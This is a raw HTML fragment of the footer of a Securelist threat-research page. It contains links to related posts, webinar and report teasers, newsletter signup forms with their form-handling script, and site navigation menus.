alt="" decoding="async" loading="lazy" data-src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/01/30185252/SL-group-policies-featured-800x450.jpg" data-srcset="" srcset="" /> </a> <div class="c-card__body"> <header class="c-card__header"> <p class="c-card__headline u-hidden u-block@md"> <a href="https://securelist.com/category/soc-ti-and-ir-posts/" class="c-tag c-tag--primary">SOC, TI and IR posts</a> </p> <h3 class="c-card__title"><a href="https://securelist.com/group-policies-in-cyberattacks/115331/" class="c-card__link">One policy to rule them all</a></h3> </header> <footer class="c-card__footer"> <div class="c-card__authors"> <ul class="c-list-authors c-list-authors--comma"> <li> <a href="https://securelist.com/author/glebivanov/" > <span>Gleb Ivanov</span></a> </li> </ul> </div> </footer> </div> </article> </div> </div> </div> </section> <section class="c-block c-block--spacing-t-small c-block--spacing-b-small@md c-block--divider-internal" data-element-id="latest-webinars-post-section"> <div class="o-container-fluid"> <h5 class="c-block__title">Latest Webinars</h5> <div class="o-row o-row--small-gutters@sm c-card__row c-card__row--fixed-width-down@sm js-slider-posts-mobile"> <div class="o-col-6@sm o-col-3@md"> <article class="c-card c-card--standard@xs"> <div class="c-card__figure"> <a href="https://securelist.com/webinars/silent-shields-digital-dragons-mdrs-proactive-protection/" class="c-card__figure-link" data-element-id="latest-webinars-post-image"> <img width="705" height="450" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/02/20111957/SL-MDR-webinar-card-image-705x450.jpg" class="attachment-securelist-2020-thumbnail size-securelist-2020-thumbnail" alt="" title="" decoding="async" loading="lazy" data-src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/02/20111957/SL-MDR-webinar-card-image-705x450.jpg" data-srcset="" srcset="" /> </a> </div> <div class="c-card__body"> <header class="c-card__header"> <p class="c-card__headline"> <a href="https://securelist.com/webinar-category/cyberthreat-talks/" class="c-tag c-tag--primary c-tag--has-icon" data-element-id="latest-webinars-post-category"><span class="c-tag__icon"><svg class="o-icon o-svg-icon o-svg-larger"><use xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="https://securelist.com/wp-content/themes/securelist2020/assets/sprite/icons.svg#icon-webinar"></use></svg></span>Cyberthreat talks</a> </p> <div class="u-flex u-justify-between"> <time datetime="2025-02-18T17:00:00+00:00" class="c-card__event-date"> 18 Feb 2025, 5:00pm </time> <span class="c-card__event-date">60 min</span> </div> <h3 class="c-card__title"><a href="https://securelist.com/webinars/silent-shields-digital-dragons-mdrs-proactive-protection/" class="c-card__link" data-element-id="latest-webinars-post-title">Silent shields &#038; digital dragons: MDR&#8217;s proactive protection</a></h3> </header> <footer class="c-card__footer"> <div class="c-card__authors"> <ul class="c-list-authors c-list-authors--comma"> <li> <a href="https://securelist.com/author/sergeysoldatov/" data-element-id="latest-webinars-post-author"> <span>Sergey Soldatov</span></a> </li> </ul> </div> </footer> </div> </article> </div> <div class="o-col-6@sm o-col-3@md"> <article class="c-card c-card--standard@xs"> <div class="c-card__figure"> <a href="https://securelist.com/webinars/from-chaos-to-control-streamlining-detection-engineering-in-security-operation-centers/" class="c-card__figure-link" data-element-id="latest-webinars-post-image"> <img width="800" height="450" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/02/14115336/webinar_Detection_Engineering_243x136-800x450.jpg" class="attachment-securelist-2020-thumbnail size-securelist-2020-thumbnail" alt="" title="" decoding="async" loading="lazy" srcset="" sizes="auto, (max-width: 800px) 100vw, 800px" data-src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/02/14115336/webinar_Detection_Engineering_243x136-800x450.jpg" data-srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/02/14115336/webinar_Detection_Engineering_243x136-800x450.jpg 800w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/02/14115336/webinar_Detection_Engineering_243x136-300x168.jpg 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/02/14115336/webinar_Detection_Engineering_243x136-500x280.jpg 500w" /> </a> </div> <div class="c-card__body"> <header class="c-card__header"> <p class="c-card__headline"> <a href="https://securelist.com/webinar-category/trainings-and-workshops/" class="c-tag c-tag--primary c-tag--has-icon" data-element-id="latest-webinars-post-category"><span class="c-tag__icon"><svg class="o-icon o-svg-icon o-svg-larger"><use xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="https://securelist.com/wp-content/themes/securelist2020/assets/sprite/icons.svg#icon-webinar"></use></svg></span>Trainings and workshops</a> </p> <div class="u-flex u-justify-between"> <time datetime="2024-12-23T17:00:00+00:00" class="c-card__event-date"> 23 Dec 2024, 5:00pm </time> <span class="c-card__event-date">60 min</span> </div> <h3 class="c-card__title"><a href="https://securelist.com/webinars/from-chaos-to-control-streamlining-detection-engineering-in-security-operation-centers/" class="c-card__link" data-element-id="latest-webinars-post-title">From chaos to control: streamlining detection engineering in Security Operation Centers</a></h3> </header> <footer class="c-card__footer"> <div class="c-card__authors"> <ul class="c-list-authors c-list-authors--comma"> <li> <a href="https://securelist.com/author/sarimrafiq/" data-element-id="latest-webinars-post-author"> <span>Sarim Rafiq Uddin</span></a> </li> </ul> </div> </footer> </div> </article> </div> <div class="o-col-6@sm o-col-3@md"> <article class="c-card c-card--standard@xs"> <div class="c-card__figure"> <a href="https://securelist.com/webinars/%d1%81rimeware-and-financial-cyberthreats-in-2025/" class="c-card__figure-link" data-element-id="latest-webinars-post-image"> <img width="800" height="450" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/12/20171256/webinar_crimeware_ksb-800x450.jpg" class="attachment-securelist-2020-thumbnail size-securelist-2020-thumbnail" alt="" title="" decoding="async" loading="lazy" srcset="" sizes="auto, (max-width: 800px) 100vw, 800px" data-src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/12/20171256/webinar_crimeware_ksb-800x450.jpg" data-srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/12/20171256/webinar_crimeware_ksb-800x450.jpg 800w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/12/20171256/webinar_crimeware_ksb-300x168.jpg 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/12/20171256/webinar_crimeware_ksb-500x280.jpg 500w" /> </a> </div> <div class="c-card__body"> <header class="c-card__header"> <p class="c-card__headline"> <a href="https://securelist.com/webinar-category/cyberthreat-talks/" class="c-tag c-tag--primary c-tag--has-icon" data-element-id="latest-webinars-post-category"><span class="c-tag__icon"><svg class="o-icon o-svg-icon o-svg-larger"><use xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="https://securelist.com/wp-content/themes/securelist2020/assets/sprite/icons.svg#icon-webinar"></use></svg></span>Cyberthreat talks</a> </p> <div class="u-flex u-justify-between"> <time datetime="2024-12-17T17:00:00+00:00" class="c-card__event-date"> 17 Dec 2024, 5:00pm </time> <span class="c-card__event-date">60 min</span> </div> <h3 class="c-card__title"><a href="https://securelist.com/webinars/%d1%81rimeware-and-financial-cyberthreats-in-2025/" class="c-card__link" data-element-id="latest-webinars-post-title">Сrimeware and financial cyberthreats in 2025</a></h3> </header> <footer class="c-card__footer"> <div class="c-card__authors"> <ul class="c-list-authors c-list-authors--comma"> <li> <a href="https://securelist.com/author/fabioa/" data-element-id="latest-webinars-post-author"> <span>Fabio Assolini</span></a> </li> <li> <a href="https://securelist.com/author/marcrivero/" data-element-id="latest-webinars-post-author"> <span>Marc Rivero</span></a> </li> <li> <a href="https://securelist.com/author/tatyanashishkova/" data-element-id="latest-webinars-post-author"> <span>Tatyana Shishkova</span></a> </li> </ul> </div> </footer> </div> </article> </div> <div class="o-col-6@sm o-col-3@md"> <article class="c-card c-card--standard@xs"> <div class="c-card__figure"> <a href="https://securelist.com/webinars/global-it-outages-and-supply-chain-attacks-2024s-lessons-and-tomorrows-cyberthreats/" class="c-card__figure-link" data-element-id="latest-webinars-post-image"> <img width="800" height="450" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/12/20170250/webinar_story_of_the_year_2024-800x450.jpg" class="attachment-securelist-2020-thumbnail size-securelist-2020-thumbnail" alt="" title="" decoding="async" loading="lazy" srcset="" sizes="auto, (max-width: 800px) 100vw, 800px" data-src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/12/20170250/webinar_story_of_the_year_2024-800x450.jpg" data-srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/12/20170250/webinar_story_of_the_year_2024-800x450.jpg 800w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/12/20170250/webinar_story_of_the_year_2024-300x168.jpg 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/12/20170250/webinar_story_of_the_year_2024-500x280.jpg 500w" /> </a> </div> <div class="c-card__body"> <header class="c-card__header"> <p class="c-card__headline"> <a href="https://securelist.com/webinar-category/cyberthreat-talks/" class="c-tag c-tag--primary c-tag--has-icon" data-element-id="latest-webinars-post-category"><span class="c-tag__icon"><svg class="o-icon o-svg-icon o-svg-larger"><use xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="https://securelist.com/wp-content/themes/securelist2020/assets/sprite/icons.svg#icon-webinar"></use></svg></span>Cyberthreat talks</a> </p> <div class="u-flex u-justify-between"> <time datetime="2024-12-09T17:00:00+00:00" class="c-card__event-date"> 09 Dec 2024, 5:00pm </time> <span class="c-card__event-date">60 min</span> </div> <h3 class="c-card__title"><a href="https://securelist.com/webinars/global-it-outages-and-supply-chain-attacks-2024s-lessons-and-tomorrows-cyberthreats/" class="c-card__link" data-element-id="latest-webinars-post-title">Global IT outages and supply chain attacks: 2024&#8217;s lessons and tomorrow&#8217;s cyberthreats</a></h3> </header> <footer class="c-card__footer"> <div class="c-card__authors"> <ul class="c-list-authors c-list-authors--comma"> <li> <a href="https://securelist.com/author/igorsoumenkov/" data-element-id="latest-webinars-post-author"> <span>Igor Kuznetsov</span></a> </li> <li> <a href="https://securelist.com/author/alexanderliskin/" data-element-id="latest-webinars-post-author"> <span>Alexander Liskin</span></a> </li> <li> <a href="https://securelist.com/author/vladimirkuskov/" data-element-id="latest-webinars-post-author"> <span>Vladimir Kuskov</span></a> </li> </ul> </div> </footer> </div> </article> </div> </div> </div> </section> <section data-element-id="footer-reports-section" class="c-block c-block--spacing-t-small c-block--spacing-b-small@md c-block--divider-internal"> <div class="o-container-fluid"> <h5 class="c-block__title">Reports</h5> <div class="o-row o-row--small-gutters"> <div class="o-col-8@sm"> <div class="o-row o-row--small-gutters"> <div class="o-col-6@md"> <article class="c-card c-card--standard@xs"> <div class="c-card__body"> <header class="c-card__header"> <h3 class="c-card__title"><a data-element-id="footer-reports-title" href="https://securelist.com/eagerbee-backdoor/115175/" class="c-card__link">EAGERBEE, with updated and novel components, targets the Middle East</a></h3> </header> <div class="c-card__desc"> <p>Kaspersky researchers analyze EAGERBEE backdoor modules, revealing a possible connection to the CoughingDown APT actor.</p> </div> </div> </article> </div> <div class="o-col-6@md c-card__dividers c-card__dividers--hide@md"> <article class="c-card c-card--standard@xs"> <div class="c-card__body"> <header class="c-card__header"> <h3 class="c-card__title"><a data-element-id="footer-reports-title" href="https://securelist.com/bellacpp-cpp-version-of-bellaciao/115087/" class="c-card__link">BellaCPP: Discovering a new BellaCiao variant written in C++</a></h3> </header> <div class="c-card__desc u-hidden u-block@md"> <p>While investigating an incident involving the BellaCiao .NET malware, Kaspersky researchers discovered a C++ version they dubbed &#8220;BellaCPP&#8221;.</p> </div> </div> </article> </div> <div class="o-col-6@md c-card__dividers c-card__dividers--hide@md"> <article class="c-card c-card--standard@xs"> <div class="c-card__body"> <header class="c-card__header"> <h3 class="c-card__title"><a data-element-id="footer-reports-title" href="https://securelist.com/lazarus-new-malware/115059/" class="c-card__link">Lazarus group evolves its infection chain with old and new malware</a></h3> </header> <div class="c-card__desc u-hidden u-block@md"> <p>Lazarus targets employees of a nuclear-related organization with a bunch of malware, such as MISTPEN, LPEClient, RollMid, CookieTime and a new modular backdoor CookiePlus.</p> </div> </div> </article> </div> <div class="o-col-6@md c-card__dividers c-card__dividers--hide@md"> <article class="c-card c-card--standard@xs"> <div class="c-card__body"> <header class="c-card__header"> <h3 class="c-card__title"><a data-element-id="footer-reports-title" href="https://securelist.com/careto-is-back/114942/" class="c-card__link">Careto is back: what&#8217;s new after 10 years of silence?</a></h3> </header> <div class="c-card__desc u-hidden u-block@md"> <p>Kaspersky researchers analyze 2019, 2022 and 2024 attacks attributed to Careto APT with medium to high confidence.</p> </div> </div> </article> </div> </div> </div> <div class="o-col-4@sm u-hidden u-block@sm"> <div class="c-image c-image--overflow-down@sm"> <a href="https://xtraining.kaspersky.com/?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_ban_sm-team___xtraining____db5c7a1470cf39c3"><img src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/12/30141748/xTraining-evergreen-banner_370x500_EN.jpg" /></a> </div> </div> </div> </div> </section> <section class="c-block c-block--spacing-t-small c-block--spacing-b-small@md" data-element-id="footer-subscribe-section"> <div class="o-container-fluid"> <div class="o-row c-block__row u-flex-nowrap@md"> <div class="o-col"> <div class="c-block__header"> <h5 class="c-block__title">Subscribe to our weekly e-mails</h5> <p>The hottest research right in your inbox</p> </div> </div> <div class="o-col u-flex-shrink-0 u-flex-grow"> <div class="c-form--newsletter u-ml-auto"> <div class='gf_browser_unknown gform_wrapper gform_wrapper_original_id_11 gravity-theme subscribe-mc_wrapper' id='gform_wrapper_2494507323' ><div id='gf_2494507323' class='gform_anchor' tabindex='-1'></div><form method='post' enctype='multipart/form-data' target='gform_ajax_frame_2494507323' id='gform_2494507323' class='subscribe-mc' action='/lazarus-threatneedle/100803/#gf_2494507323' > <div class="gform-content-wrapper"><div class='gform_body gform-body'><div id='gform_fields_2494507323' class='gform_fields top_label form_sublabel_below description_below'><div id="field_11_1" class="gfield gfield_contains_required field_sublabel_below field_description_below gfield_visibility_visible" ><label class='gfield_label screen-reader-text' for='input_2494507323_1' >Email<span class="gfield_required"><span class="gfield_required gfield_required_text">(Required)</span></span></label><div class='ginput_container ginput_container_email'> <input name='input_1' id='input_2494507323_1' type='text' value='' class='medium' placeholder='Email' aria-required="true" aria-invalid="false" /> </div></div><div id="field_11_3" class="gfield js-kaspersky-gform-recaptcha-placeholder gform_hidden field_sublabel_below field_description_below gfield_visibility_hidden" ><div class='ginput_container ginput_container_text'><input name='input_3' id='input_2494507323_3' type='hidden' class='gform_hidden' aria-invalid="false" value='' /></div></div><fieldset id="field_11_2" class="gfield input-without-label label-gdpr gfield_contains_required field_sublabel_below field_description_below gfield_visibility_visible" ><legend class='gfield_label screen-reader-text gfield_label_before_complex' ><span class="gfield_required"><span class="gfield_required gfield_required_text">(Required)</span></span></legend><div class='ginput_container ginput_container_checkbox'><div class='gfield_checkbox' id='input_2494507323_2'><div class='gchoice gchoice_11_2_1'> <input class='gfield-choice-input' name='input_2.1' type='checkbox' value='I agree' id='choice_2494507323_11_2_1' /> <label for='choice_2494507323_11_2_1' id='label_2494507323_11_2_1'>I agree to provide my email address to “AO Kaspersky Lab” to receive information about new posts on the site. I understand that I can withdraw this consent at any time via e-mail by clicking the “unsubscribe” link that I find at the bottom of any e-mail sent to me for the purposes mentioned above.</label> </div></div></div></fieldset></div></div> <div class='gform_footer top_label'> <button class="gform_button button" type="submit" id='gform_submit_button_2494507323' value="Sign up"> <svg class="o-icon o-svg-icon o-svg-large u-hidden u-inline-block@sm"><use xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="https://securelist.com/wp-content/themes/securelist2020/assets/sprite/icons.svg#icon-envelope"></use></svg> <span class="u-hidden u-inline@sm">Subscribe</span> <span class="u-hidden@sm"><svg class="o-icon o-svg-icon o-svg-right"><use xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="https://securelist.com/wp-content/themes/securelist2020/assets/sprite/icons.svg#icon-arrow"></use></svg></span> </button> <input type='hidden' name='gform_ajax' value='form_id=11&amp;title=&amp;description=&amp;tabindex=0' /> <input type='hidden' class='gform_hidden' name='is_submit_11' value='1' /> <input type='hidden' class='gform_hidden' name='gform_submit' value='11' /> <input type='hidden' class='gform_hidden' name='gform_unique_id' value='' /> <input type='hidden' class='gform_hidden' name='state_11' value='WyJbXSIsImIwODQwZTA2ZGQ0NzYwODcyOTBkZjNmZDM1NDk2Y2ZkIl0=' /> <input type='hidden' class='gform_hidden' name='gform_target_page_number_11' id='gform_target_page_number_2494507323_11' value='0' /> <input type='hidden' class='gform_hidden' name='gform_source_page_number_11' id='gform_source_page_number_2494507323_11' value='1' /> <input type='hidden' name='gform_random_id' value='2494507323' /><input type='hidden' name='gform_field_values' value='securelist_2020_form_location=' /> </div> </div><p style="display: none !important;" class="akismet-fields-container" data-prefix="ak_"><label>&#916;<textarea name="ak_hp_textarea" cols="45" rows="8" maxlength="100"></textarea></label><input type="hidden" id="ak_js_3" name="ak_js" value="189"/><script>document.getElementById( "ak_js_3" ).setAttribute( "value", ( new Date() ).getTime() );</script></p></form> </div> <iframe style='display:none;width:0px;height:0px;' src='about:blank' name='gform_ajax_frame_2494507323' id='gform_ajax_frame_2494507323' title='This iframe contains the logic required to handle Ajax powered Gravity Forms.'></iframe> <script type="text/javascript"> /* <![CDATA[ */ gform.initializeOnLoaded( function() {gformInitSpinner( 2494507323, 'https://securelist.com/wp-content/themes/securelist2020/assets/images/content/ajax-spinner-red.svg' );jQuery('#gform_ajax_frame_2494507323').on('load',function(){var contents = jQuery(this).contents().find('*').html();var is_postback = contents.indexOf('GF_AJAX_POSTBACK') >= 0;if(!is_postback){return;}var form_content = jQuery(this).contents().find('#gform_wrapper_2494507323');var is_confirmation = jQuery(this).contents().find('#gform_confirmation_wrapper_2494507323').length > 0;var is_redirect = contents.indexOf('gformRedirect(){') >= 0;var is_form = form_content.length > 0 && ! is_redirect && ! is_confirmation;var mt = parseInt(jQuery('html').css('margin-top'), 10) + parseInt(jQuery('body').css('margin-top'), 10) + 100;if(is_form){jQuery('#gform_wrapper_2494507323').html(form_content.html());if(form_content.hasClass('gform_validation_error')){jQuery('#gform_wrapper_2494507323').addClass('gform_validation_error');} else {jQuery('#gform_wrapper_2494507323').removeClass('gform_validation_error');}setTimeout( function() { /* delay the scroll by 50 milliseconds to fix a bug in chrome */ jQuery(document).scrollTop(jQuery('#gform_wrapper_2494507323').offset().top - mt); }, 50 );if(window['gformInitDatepicker']) {gformInitDatepicker();}if(window['gformInitPriceFields']) {gformInitPriceFields();}var current_page = jQuery('#gform_source_page_number_2494507323_11').val();gformInitSpinner( 2494507323, 'https://securelist.com/wp-content/themes/securelist2020/assets/images/content/ajax-spinner-red.svg' );jQuery(document).trigger('gform_page_loaded', [2494507323, current_page]);window['gf_submitting_2494507323'] = false;}else if(!is_redirect){var confirmation_content = jQuery(this).contents().find('.GF_AJAX_POSTBACK').html();if(!confirmation_content){confirmation_content = contents;}setTimeout(function(){jQuery('#gform_wrapper_2494507323').replaceWith(confirmation_content);jQuery(document).scrollTop(jQuery('#gf_2494507323').offset().top - mt);jQuery(document).trigger('gform_confirmation_loaded', [2494507323]);window['gf_submitting_2494507323'] = false;wp.a11y.speak(jQuery('#gform_confirmation_message_2494507323').text());}, 50);}else{jQuery('#gform_2494507323').append(contents);if(window['gformRedirect']) {gformRedirect();}}jQuery(document).trigger('gform_post_render', [2494507323, current_page]);} );} ); /* ]]> */ </script> </div> </div> </div> <div class="u-hidden@sm u-mb-spacer-base-"> <div class="c-image c-image--overflow-down@sm"> <a href="https://xtraining.kaspersky.com/?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_ban_sm-team___xtraining____db5c7a1470cf39c3"><img src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/12/30141758/xTraining-evergreen-banner_800x800_EN-740x740.jpg" /></a> </div> </div> </div> </section> </div><!-- /.c-page --> <section class="c-block c-block--spacing-t-small c-block--spacing-t-large@md c-block--spacing-b c-page-footer c-block--bg-image c-color--invert" style="background-image: url(https://securelist.com/wp-content/themes/securelist2020/assets/images/content/bg-gradient-02.jpg);"> <div class="o-container-fluid"> <div data-element-id="footer-content-block" class="c-page-footer__content"> <div class="o-row o-row--reverse"> <div class="o-col-9@md"> <div class="c-page-menu"> <div class="o-row c-page-menu__dividers"> <div class="o-col-4@md"><div class="c-accordion js-accordion c-accordion--reset@md"><p class="menu-item-threats section-title accordion menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-226 c-page-menu__title u-hidden u-block@md"><a href="https://securelist.com/threat-categories/" data-element-id="footer-content-link">Threats</a></p><div class="c-accordion-toggle js-accordion-toggle"><p>Threats</p></div><div class="c-accordion-container js-accordion-container"> <ul class="sub-menu"> <li class="menu-item menu-item-type-taxonomy menu-item-object-threat-category current-post-ancestor current-menu-parent current-post-parent menu-item-99839"><a href="https://securelist.com/threat-category/apt-targeted-attacks/" data-element-id="footer-content-link">APT (Targeted attacks)</a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-89457"><a href="https://securelist.com/threat-category/secure-environment/" data-element-id="footer-content-link">Secure environment (IoT)</a></li> <li class="topic-item vulnerabilities menu-item menu-item-type-custom menu-item-object-custom menu-item-63231"><a href="https://securelist.com/threat-category/mobile-threats/" data-element-id="footer-content-link">Mobile threats</a></li> <li class="topic-item detected menu-item menu-item-type-custom menu-item-object-custom menu-item-63229"><a href="https://securelist.com/threat-category/financial-threats/" data-element-id="footer-content-link">Financial threats</a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-89458"><a href="https://securelist.com/threat-category/spam-and-phishing/" data-element-id="footer-content-link">Spam and phishing</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-threat-category current-post-ancestor current-menu-parent current-post-parent menu-item-99840"><a href="https://securelist.com/threat-category/industrial-threats/" data-element-id="footer-content-link">Industrial threats</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-threat-category menu-item-89465"><a href="https://securelist.com/threat-category/web-threats/" data-element-id="footer-content-link">Web threats</a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-89459"><a href="https://securelist.com/threat-category/vulnerabilities-and-exploits/" data-element-id="footer-content-link">Vulnerabilities and exploits</a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-113855"><a href="https://securelist.com/threat-categories/" data-element-id="footer-content-link">All threats</a></li> </ul> </li> </li></ul></div></div></div><div class="o-col-4@md"><div class="c-accordion js-accordion c-accordion--reset@md"><p class="menu-item-categories section-title accordion menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-230 c-page-menu__title u-hidden u-block@md"><a href="https://securelist.com/categories/" data-element-id="footer-content-link">Categories</a></p><div class="c-accordion-toggle js-accordion-toggle"><p>Categories</p></div><div class="c-accordion-container js-accordion-container"> <ul class="sub-menu"> <li class="menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor current-menu-parent current-post-parent menu-item-84158"><a href="https://securelist.com/category/apt-reports/" data-element-id="footer-content-link">APT reports</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-99841"><a href="https://securelist.com/category/malware-descriptions/" data-element-id="footer-content-link">Malware descriptions</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-84160"><a href="https://securelist.com/category/kaspersky-security-bulletin/" data-element-id="footer-content-link">Security Bulletin</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-84161"><a href="https://securelist.com/category/malware-reports/" data-element-id="footer-content-link">Malware reports</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-89460"><a href="https://securelist.com/category/spam-and-phishing-reports/" data-element-id="footer-content-link">Spam and phishing reports</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-99842"><a href="https://securelist.com/category/security-technologies/" data-element-id="footer-content-link">Security technologies</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-84165"><a href="https://securelist.com/category/research/" data-element-id="footer-content-link">Research</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-84164"><a href="https://securelist.com/category/publications/" data-element-id="footer-content-link">Publications</a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-113876"><a href="https://securelist.com/categories/" data-element-id="footer-content-link">All categories</a></li> </ul> </li> </li></ul></div></div></div><div class="o-col-4@md"><p class="menu-item-tags section-title after-accordion menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-277 c-page-menu__title u-hidden u-block@md"><a data-element-id="footer-content-link">Other sections</a></p> <ul class="sub-menu"> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-100526"><a href="https://securelist.com/all/" data-element-id="footer-content-link">Archive</a></li> <li class="show-all-tags menu-item menu-item-type-post_type menu-item-object-page menu-item-57837"><a href="https://securelist.com/tags/" data-element-id="footer-content-link">All tags</a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-101956"><a href="https://securelist.com/webinars/" data-element-id="footer-content-link">Webinars</a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-101126"><a target="_blank" rel="noopener noreferrer" href="https://apt.securelist.com/?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="footer-content-link">APT Logbook</a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-241"><a target="_blank" rel="noopener noreferrer" href="https://statistics.securelist.com/?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="footer-content-link">Statistics</a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-86643"><a target="_blank" rel="noopener noreferrer" href="https://encyclopedia.kaspersky.com/?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="footer-content-link">Encyclopedia</a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-58141"><a target="_blank" rel="noopener noreferrer" href="https://threats.kaspersky.com/?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="footer-content-link">Threats descriptions</a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-115044"><a href="https://securelist.com/ksb-2024/" data-element-id="footer-content-link">KSB 2024</a></li> </ul> </li> </div> </div> </div> </div> <div class="o-col-3@md"> <div class="c-site-logo c-site-logo--kaspersky"></div> </div> </div> </div> <div data-element-id="footer-menu-block" class="c-page-footer__wrapper"> <div class="c-page-footer__info"> <p>© 2025 AO Kaspersky Lab. All Rights Reserved.<br /> Registered trademarks and service marks are the property of their respective owners.</p> </div> <div class="c-page-footer__links"> <ul> <li><a data-element-id="footer-menu-link" href="https://www.kaspersky.com/web-privacy-policy?icid=gl_seclistfooter_acq_ona_smm__onl_b2b_securelist_footer_sm-team_______11d7a8212d94123d">Privacy Policy</a></li> <li><a data-element-id="footer-menu-link" href="https://www.kaspersky.com/end-user-license-agreement?icid=gl_seclistfooter_acq_ona_smm__onl_b2b_securelist_footer_sm-team_______11d7a8212d94123d">License Agreement</a></li> <li><a data-element-id="footer-menu-link" href="javascript: void(0);" onclick="javascript: Cookiebot.renew()">Cookies</a></li> </ul> </div> </div> </div> </section> <div id="modal-newsletter" class="c-modal__wrapper c-modal__wrapper--sm mfp-hide"> <div class="c-modal"> <a href="#" class="c-modal-close js-modal-close"></a> <div class="c-modal__main"> <div class="c-block c-block--spacing-t-small c-block--spacing-b-small"> <div class="o-container-fluid"> <div class="c-block__header"> <h5 class="c-title--small">Subscribe to our weekly e-mails</h5> <p>The hottest research right in your inbox</p> </div> <div class="c-form--float-labels js-float-labels"> <div class='gf_browser_unknown gform_wrapper gform_wrapper_original_id_11 gravity-theme subscribe-mc_wrapper' id='gform_wrapper_1719933889' ><div id='gf_1719933889' class='gform_anchor' tabindex='-1'></div><form method='post' enctype='multipart/form-data' target='gform_ajax_frame_1719933889' id='gform_1719933889' class='subscribe-mc' action='/lazarus-threatneedle/100803/#gf_1719933889' > <div class="gform-content-wrapper"><div class='gform_body gform-body'><div id='gform_fields_1719933889' class='gform_fields top_label form_sublabel_below description_below'><div id="field_11_1" class="gfield gfield_contains_required field_sublabel_below field_description_below gfield_visibility_visible" ><label class='gfield_label screen-reader-text' for='input_1719933889_1' >Email<span class="gfield_required"><span class="gfield_required gfield_required_text">(Required)</span></span></label><div class='ginput_container ginput_container_email'> <input name='input_1' id='input_1719933889_1' type='text' value='' class='medium' placeholder='Email' aria-required="true" aria-invalid="false" /> </div></div><div id="field_11_3" class="gfield js-kaspersky-gform-recaptcha-placeholder gform_hidden field_sublabel_below field_description_below gfield_visibility_hidden" ><div class='ginput_container ginput_container_text'><input name='input_3' id='input_1719933889_3' type='hidden' class='gform_hidden' aria-invalid="false" value='' /></div></div><fieldset id="field_11_2" class="gfield input-without-label label-gdpr gfield_contains_required field_sublabel_below field_description_below gfield_visibility_visible" ><legend class='gfield_label screen-reader-text gfield_label_before_complex' ><span class="gfield_required"><span class="gfield_required gfield_required_text">(Required)</span></span></legend><div class='ginput_container ginput_container_checkbox'><div class='gfield_checkbox' id='input_1719933889_2'><div class='gchoice gchoice_11_2_1'> <input class='gfield-choice-input' name='input_2.1' type='checkbox' value='I agree' id='choice_1719933889_11_2_1' /> <label for='choice_1719933889_11_2_1' id='label_1719933889_11_2_1'>I agree to provide my email address to “AO Kaspersky Lab” to receive information about new posts on the site. I understand that I can withdraw this consent at any time via e-mail by clicking the “unsubscribe” link that I find at the bottom of any e-mail sent to me for the purposes mentioned above.</label> </div></div></div></fieldset></div></div> <div class='gform_footer top_label'> <button type="submit" class="gform_button button" id='gform_submit_button_1719933889' value="Sign up"> <svg class="o-icon o-svg-icon 